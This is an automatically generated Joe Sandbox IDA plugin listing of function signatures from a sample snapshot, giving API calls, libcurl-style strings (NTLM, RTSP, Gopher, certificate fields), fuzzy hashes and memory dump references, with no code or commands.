                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %sAuthorization: NTLM %s$HTTP$NTLM$Proxy-
                                        • API String ID: 1294909896-3948863929
                                        • Opcode ID: e9e475ad4b3651e4003d17a8e6ef36f07f97d20f7521292248c766d0bd55578f
                                        • Instruction ID: cfe99a2a142c785c02dd4ab5ef21b924b4da5d020048a893378abe157adc62a1
                                        • Opcode Fuzzy Hash: e9e475ad4b3651e4003d17a8e6ef36f07f97d20f7521292248c766d0bd55578f
                                        • Instruction Fuzzy Hash: 6C614A32A08B8285EBA08F16E4443AB7BA5FB44B88F204036EA8D87795DFBCD545C741
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: __stdio_common_vsscanfmallocmemcpystrncmp
                                        • String ID: : %ld$CSeq:$Got RTSP Session ID Line [%s], but wanted ID [%s]$Got a blank Session ID$Session:$Unable to read the CSeq header: [%s]
                                        • API String ID: 1392894463-1168109407
                                        • Opcode ID: 9ee667e3ef2b8362d973f2be99724709101bc31ecf6e59961fe177d2da80cc60
                                        • Instruction ID: 46216fba4085151d26714448d049c4c49038b3aaa79ec7e736bd70753a1b196c
                                        • Opcode Fuzzy Hash: 9ee667e3ef2b8362d973f2be99724709101bc31ecf6e59961fe177d2da80cc60
                                        • Instruction Fuzzy Hash: 1641C431A0868282EF509B6694402B96F91FF45BDCF684136EA5EDB2D7FF6CE505C310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strchr$mallocrealloc
                                        • String ID: 0123456789-$<DIR>$APM0123456789:
                                        • API String ID: 359134164-4291660576
                                        • Opcode ID: f6c3b07ae69c7a76d4dcae46c8e10b4f490ffa99a37a4308854842f81971856a
                                        • Instruction ID: c09fab62639db5c8b0456138a432552b488fd79385f179f404064f107fd57b8a
                                        • Opcode Fuzzy Hash: f6c3b07ae69c7a76d4dcae46c8e10b4f490ffa99a37a4308854842f81971856a
                                        • Instruction Fuzzy Hash: DFB16D36A4974686EBE4CF26D05033A6BA0FF45B5CF288036DA4E87796DFB8E451C350
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: malloc$Ioctlsetsockopt
                                        • String ID: Failed to alloc scratch buffer!$We are completely uploaded and fine
                                        • API String ID: 3352517165-607151321
                                        • Opcode ID: b9627e339377f4afc09bd61a2b3bbe61811f8332dd5050806245f8fe69c5be20
                                        • Instruction ID: 44bb43805c573ab6b70d782cdf3ab6d1395b93bc3f984752e2f550291d8a88f7
                                        • Opcode Fuzzy Hash: b9627e339377f4afc09bd61a2b3bbe61811f8332dd5050806245f8fe69c5be20
                                        • Instruction Fuzzy Hash: 99B16172A08B8685EB618F26D4443F92B90EF44F9CF284535CE4D8B79ADFBC9495C320
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$_strdupmalloc
                                        • String ID: %s?%s$Failed sending Gopher request
                                        • API String ID: 111713529-132698833
                                        • Opcode ID: 13fe5a4ff89900cde43d12d60b5a153ca477e5e697ee87ce4cce1d0f152c96a7
                                        • Instruction ID: 6e4b0e392d86afef88eb11450efe48b724db5aabc8d37eee3b46f42a86f1d282
                                        • Opcode Fuzzy Hash: 13fe5a4ff89900cde43d12d60b5a153ca477e5e697ee87ce4cce1d0f152c96a7
                                        • Instruction Fuzzy Hash: E3518621A09A8282FB519B67A4101BA6B94FF85BF8F640631DEAD877D6EE7CD441C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
                                        • String ID: value
                                        • API String ID: 1346393832-494360628
                                        • Opcode ID: 6847a968dd99818818966be80c22a6ae0b7eae4d3ff03531010b536a3c6974c3
                                        • Instruction ID: bcae4b5634e72b5d4fa9cc7a6aac5cb84dc5babd21f55932d1727683d8e553f7
                                        • Opcode Fuzzy Hash: 6847a968dd99818818966be80c22a6ae0b7eae4d3ff03531010b536a3c6974c3
                                        • Instruction Fuzzy Hash: 56619162E18B8585EB10CB79E4843ED2761FF457A8F205331EA6D56ADADFBCD085C340
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
                                        • String ID: value
                                        • API String ID: 1346393832-494360628
                                        • Opcode ID: 8a8ff242f02a9236229a831a3fccc6dff901718e43974036dda4f5f8c8ed984b
                                        • Instruction ID: 8baccd89499c00b8193bca3703897ca889575f0c9202278eec7f77e7949cbbf4
                                        • Opcode Fuzzy Hash: 8a8ff242f02a9236229a831a3fccc6dff901718e43974036dda4f5f8c8ed984b
                                        • Instruction Fuzzy Hash: B3619372E18B8586EB10CB65E4843ED2761EF857A8F204335EA6D56ADADFBCD085C340
                                        APIs
                                        • strchr.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029E7506
                                        • _open.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029E755B
                                        • _fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029E75CC
                                        • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029E75D9
                                        • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6029E76EB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _close$_fstat64_openstrchr
                                        • String ID: Can't get the size of %s$Can't open %s for writing
                                        • API String ID: 423814720-3544860555
                                        • Opcode ID: e5c8fb1ec35a5549d700875c8203deee49073a84587174603ce729f0572fed4b
                                        • Instruction ID: 243670ef4faf91babf156a566aeb6a3b7151860656b822fbdb865748b892c34e
                                        • Opcode Fuzzy Hash: e5c8fb1ec35a5549d700875c8203deee49073a84587174603ce729f0572fed4b
                                        • Instruction Fuzzy Hash: 51518371B08A8281EE148B6694503F9AB91FF85BDCF644435DE4EC7396EEBCE4418301
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freemalloc$_strdupstrtol
                                        • String ID: %%%02x
                                        • API String ID: 2999891020-4020994737
                                        • Opcode ID: 6a801598b4c74b21c1fa39b5fd3dd7a905dae2e9e63405a51e711a2ace6544f3
                                        • Instruction ID: d355abf94c1f8ff3878bd6578c08de82ae0ce59a806c7aed606a7d9be48a59c4
                                        • Opcode Fuzzy Hash: 6a801598b4c74b21c1fa39b5fd3dd7a905dae2e9e63405a51e711a2ace6544f3
                                        • Instruction Fuzzy Hash: AF51A022A0D68245FF628B22A0143792F91BF55798F680173DA9E86BC2FEADE545D301
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$malloc$_strdup
                                        • String ID: %%%02x
                                        • API String ID: 1496848336-4020994737
                                        • Opcode ID: 47e6af600c9d1d346c1937aab269d8273d8af942b88f53c16fc3d7d3e07b8469
                                        • Instruction ID: 8282ae46e8c5a34d3633ae590fa99c7bcf0507e33e2d038b51f04a0ea3089ae6
                                        • Opcode Fuzzy Hash: 47e6af600c9d1d346c1937aab269d8273d8af942b88f53c16fc3d7d3e07b8469
                                        • Instruction Fuzzy Hash: 2B41B322A0D68245EF628B12A0143792FD1BF55798F280573DEDE86BC2EEADE544D310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$_strdupmalloc
                                        • String ID: Serial Number: %s$ Signature Algorithm: %s$Serial Number$Signature Algorithm
                                        • API String ID: 111713529-517259162
                                        • Opcode ID: 4ad8c825ccfcb54f95674c0dcb7cdfa92c224264c5baeb7d6188afb13df6f0f6
                                        • Instruction ID: 72cdc5d2e9801ee6712ba2a65e71097c401eaabfac4ad52d27c88c1038056c16
                                        • Opcode Fuzzy Hash: 4ad8c825ccfcb54f95674c0dcb7cdfa92c224264c5baeb7d6188afb13df6f0f6
                                        • Instruction Fuzzy Hash: 17317491E4978248EF948B6294541FA2FA5BF05B8CF640835DE4E9775BEFBCE144C301
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                        • String ID:
                                        • API String ID: 3063020102-0
                                        • Opcode ID: 7070731933ec388b5f88244cb03a6580e00f4c7de7c89b7d91ac03e7bb34ef79
                                        • Instruction ID: daa109e1ec7d8611ccfc6a2b06206dafb41ff995ec1fe5ef8726486bd133e912
                                        • Opcode Fuzzy Hash: 7070731933ec388b5f88244cb03a6580e00f4c7de7c89b7d91ac03e7bb34ef79
                                        • Instruction Fuzzy Hash: 6CB1BF22F18B8285FB10CB66E4443AD2B61EF447A8F604635DE6D53AD6DFBCE095D380
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Serial Number: %s$ Signature Algorithm: %s$ GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$Serial Number$Signature Algorithm
                                        • API String ID: 1294909896-599393795
                                        • Opcode ID: 9abdc7800897664ab45268b87967cada86f487af973ba71b71faca93e2bc1046
                                        • Instruction ID: a8f511b0327833f5a95bbe4cf1a238c6c82b4469a203ed35419e3e2c9dea6def
                                        • Opcode Fuzzy Hash: 9abdc7800897664ab45268b87967cada86f487af973ba71b71faca93e2bc1046
                                        • Instruction Fuzzy Hash: 1161F461A4879244EBE08B6694441FABFA4FF0578CF644436EA4DD7B9ADFBCE141C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$malloc$memcpy
                                        • String ID: Signature: %s$Signature
                                        • API String ID: 901724546-1663925961
                                        • Opcode ID: 47d8be27700f296a11b72f90afc98f6705cfe901cbe2814c0c12018f30ada7c7
                                        • Instruction ID: ec8bc51afbd9fce0de605dc7ebd862891a368d56eb546576b9f4900e7ba9282d
                                        • Opcode Fuzzy Hash: 47d8be27700f296a11b72f90afc98f6705cfe901cbe2814c0c12018f30ada7c7
                                        • Instruction Fuzzy Hash: BD512812B4868246EFD8871690183BB2B91FF45BE8F240135DE6F877D6EEACE085C301
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdup
                                        • String ID:
                                        • API String ID: 1169197092-0
                                        • Opcode ID: 6357a9bd726c514b9537bb7ab30b8792c16bcd5251ca2c88349b3d87cfd3c4aa
                                        • Instruction ID: 9110a0dd3cfc00dfc53d9f543214cc03dc6e132427d2734563e987a8904eef86
                                        • Opcode Fuzzy Hash: 6357a9bd726c514b9537bb7ab30b8792c16bcd5251ca2c88349b3d87cfd3c4aa
                                        • Instruction Fuzzy Hash: CE512F26A1AB8182EF56CF56F5501297BA4FF48B88B281135EF9E43B49DF38D4E1C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Serial Number: %s$ Signature Algorithm: %s$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$GMT$Serial Number$Signature Algorithm
                                        • API String ID: 1294909896-3876350232
                                        • Opcode ID: d49d0fec6018ad6c37eadfc80c8b36a17024eb9138f7c190acf9ab5c99e4fe88
                                        • Instruction ID: 7625f69896fc9b7c05dfc66542af2a0acf3eed3d055c6dbb1b7216bda4806e3d
                                        • Opcode Fuzzy Hash: d49d0fec6018ad6c37eadfc80c8b36a17024eb9138f7c190acf9ab5c99e4fe88
                                        • Instruction Fuzzy Hash: 88517561E4978284EBE08B6294401FA7F61FF45B8CF684435EA4D9765BDFBCE545C300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$mallocmemcpy
                                        • String ID: Expire Date: %s$ Public Key Algorithm: %s$Expire Date$Public Key Algorithm
                                        • API String ID: 3401966785-2901970132
                                        • Opcode ID: dfcbbc16d3bd6a6aff9960da1f9d9e569395f30e8f586d22ed38cdd3c36d727d
                                        • Instruction ID: 1fffaabfb71382b58c4d1f6c6c1b872bfa31679c1dd0baf252d06f0394ca5290
                                        • Opcode Fuzzy Hash: dfcbbc16d3bd6a6aff9960da1f9d9e569395f30e8f586d22ed38cdd3c36d727d
                                        • Instruction Fuzzy Hash: 5941A365A0878244EFD58B6294441FA2BA1BF05BDCF644935DE0D9B79AEFBCE144C300
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: cdd882aa0eb0c59bba6af1d881fe4002e072876f2fb64ac32148e530adc62b87
                                        • Instruction ID: 0a28d338a9c406a11915cbd5fba4bbcb176901444c8563eb42c61e6a4a8d0798
                                        • Opcode Fuzzy Hash: cdd882aa0eb0c59bba6af1d881fe4002e072876f2fb64ac32148e530adc62b87
                                        • Instruction Fuzzy Hash: B8413A72A08B4382E761DF22D4502793BA4FF89F98F244535DA8D93755CFB8D890E390
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: ba3c6830358e7528ed72be0c954360400be3cdaf49af343b8df36180f5656063
                                        • Instruction ID: c0848455ea28dc30aa8df367c1f8dfee0831fda0fefdc615a4d0c592ca16ad11
                                        • Opcode Fuzzy Hash: ba3c6830358e7528ed72be0c954360400be3cdaf49af343b8df36180f5656063
                                        • Instruction Fuzzy Hash: EF31FA36A08A5185D721DF12E9542296B74FF84FD8F240431DE9D87B59CFBDE481D700
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
